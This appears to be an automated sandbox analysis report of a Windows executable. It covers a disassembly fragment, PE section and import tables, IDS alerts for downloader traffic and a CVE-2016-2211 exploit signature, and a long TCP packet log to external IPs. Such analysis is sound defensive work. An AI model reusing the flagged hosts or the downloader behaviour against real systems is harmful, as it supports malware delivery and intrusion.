                                                                            push 0040937Ch
                                                                            push 004281E0h
                                                                            call 00007F3FDCE0E8ADh
                                                                            call dword ptr [00407134h]
                                                                            mov ebx, 00434000h
                                                                            push eax
                                                                            push ebx
                                                                            call 00007F3FDCE0E89Bh
                                                                            push ebp
                                                                            call dword ptr [0040710Ch]
                                                                            cmp word ptr [00434000h], 0022h
                                                                            mov dword ptr [004291E0h], eax
                                                                            mov eax, ebx
                                                                            jne 00007F3FDCE0BD9Ah
                                                                            push 00000022h
                                                                            mov eax, 00434002h
                                                                            pop esi
                                                                            push esi
                                                                            push eax
                                                                            call 00007F3FDCE0E309h
                                                                            push eax
                                                                            call dword ptr [00407240h]
                                                                            mov dword ptr [esp+18h], eax
                                                                            jmp 00007F3FDCE0BE5Eh
                                                                            push 00000020h
                                                                            pop edx
                                                                            cmp cx, dx
                                                                            jne 00007F3FDCE0BD99h
                                                                            inc eax
                                                                            inc eax
                                                                            cmp word ptr [eax], dx
                                                                            je 00007F3FDCE0BD8Bh
                                                                            add word ptr [eax], 0000h

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6d0000x271f8.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa4cc80x918
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                            Sections

                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000x5e200x6000dd493ae9ebfb948f2a612edd72200a78False0.6545003255208334data6.407301589030798IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x70000x13540x14008a134e15423272c853e24b49bfc8707fFalse0.43046875data5.037834422880877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x90000x202d80x600baf389fb3ef48369d3c1f90021fcff8bFalse0.4733072916666667data3.7606720362000137IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .ndata0x2a0000x430000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                            .rsrc0x6d0000x271f80x272001d37c42d5ee68a600bda4509cd11f047False0.49120781749201275data5.995617174533498IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                            Resources

                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                            RT_ICON0x6d2f80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/mEnglishUnited States0.19167751094286054
                                                                            RT_ICON0x7db200xe059PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9314853829679801
                                                                            RT_ICON0x8bb800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/mEnglishUnited States0.269189891355692
                                                                            RT_ICON0x8fda80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/mEnglishUnited States0.29688796680497925
                                                                            RT_ICON0x923500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/mEnglishUnited States0.3599906191369606
                                                                            RT_ICON0x933f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/mEnglishUnited States0.5186170212765957
                                                                            RT_DIALOG0x938600x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x939600x11cdataEnglishUnited States0.6091549295774648
                                                                            RT_DIALOG0x93a800xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x93b480x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x93ba80x5adataEnglishUnited States0.7666666666666667
                                                                            RT_VERSION0x93c080x2e4dataEnglishUnited States0.4418918918918919
                                                                            RT_MANIFEST0x93ef00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                                            Imports

                                                                            DLLImport
                                                                            KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, MultiByteToWideChar, FindClose, MulDiv, ReadFile, WriteFile, lstrlenA, WideCharToMultiByte
                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                            ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                            VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-04T07:13:21.664986+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549704TCP
                                                                            2024-11-04T07:13:37.121948+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549787141.98.10.4080TCP
                                                                            2024-11-04T07:13:40.417427+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549804193.122.6.16880TCP
                                                                            2024-11-04T07:13:41.823378+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549804193.122.6.16880TCP
                                                                            2024-11-04T07:13:42.525588+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549819188.114.96.3443TCP
                                                                            2024-11-04T07:13:43.417133+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549825193.122.6.16880TCP
                                                                            2024-11-04T07:13:44.137122+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549829188.114.96.3443TCP
                                                                            2024-11-04T07:13:49.154916+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549864188.114.96.3443TCP
                                                                            2024-11-04T07:13:52.375517+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549887188.114.96.3443TCP
                                                                            2024-11-04T07:14:01.197295+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.549932TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 4, 2024 07:13:36.242943048 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:36.248636007 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:36.248702049 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:36.248771906 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:36.254301071 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121876001 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121886969 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121911049 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121918917 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121948004 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.121973038 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.121979952 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.122018099 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.122049093 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.122057915 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.122066975 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.122076988 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.122086048 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.122097015 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.122107983 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.122128010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.128184080 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.128195047 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.128205061 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.128215075 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.128238916 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.128266096 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.128557920 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.128602028 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.258690119 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258702040 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258738041 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258745909 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.258776903 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.258781910 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258794069 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258831024 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.258857012 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258872986 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.258908987 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.259699106 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.259710073 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.259718895 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.259753942 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.259768009 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.260066986 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.260078907 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.260090113 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.260119915 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.260130882 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.260499954 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.260509014 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.260576010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.260607958 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377482891 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377504110 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377536058 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377547026 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377577066 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377593040 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377605915 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377614975 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377616882 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377629995 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377635956 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377654076 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.377984047 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.377993107 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378035069 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.378125906 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378138065 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378148079 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378168106 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.378180981 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.378501892 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378513098 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378523111 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.378555059 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.378583908 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.395809889 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.395915031 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.395940065 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.395957947 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690093994 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690119028 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690129042 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690155983 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690176010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690253973 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690264940 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690275908 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690285921 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690301895 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690304041 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690310955 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690321922 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690330982 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690332890 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690350056 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690367937 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690375090 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690395117 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690407038 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690411091 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690449953 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690459013 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690507889 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690517902 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690527916 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690537930 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690548897 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690560102 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690561056 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690570116 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690583944 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690597057 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690599918 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690609932 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690629005 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690639019 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690644979 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690649986 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690660000 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690670967 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690675974 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690680981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690701008 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690701008 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690718889 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690721035 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690727949 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.690746069 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.690771103 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.733907938 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.733921051 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.733932018 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.733966112 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.733973980 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.733994961 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734035969 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734144926 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734189034 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734198093 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734227896 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734327078 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734338045 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734348059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734359980 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734375954 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734406948 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734854937 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734869957 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734879971 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.734905005 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.734919071 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.735174894 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.735184908 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.735215902 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.738527060 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.738535881 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.738570929 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.795090914 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.795135021 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.795154095 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.795182943 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.852598906 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852619886 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852631092 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852642059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852653027 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852668047 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.852703094 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.852961063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852972031 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.852982044 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853013039 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853023052 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853271008 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853296041 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853305101 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853317022 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853324890 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853338957 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853652954 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853663921 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853672981 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853683949 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.853699923 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.853727102 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.857064009 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.857081890 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.857130051 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.913783073 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.913794994 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.913836956 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971159935 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971179962 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971190929 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971215010 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971230030 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971307039 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971344948 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971364975 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971497059 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971508980 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971518993 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971534014 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971558094 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971806049 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971816063 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971827030 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.971849918 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.971859932 CET4978780192.168.2.5141.98.10.40
                                                                            Nov 4, 2024 07:13:37.972189903 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972201109 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972210884 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972223043 CET8049787141.98.10.40192.168.2.5
                                                                            Nov 4, 2024 07:13:37.972234011 CET8049787141.98.10.40192.168.2.5
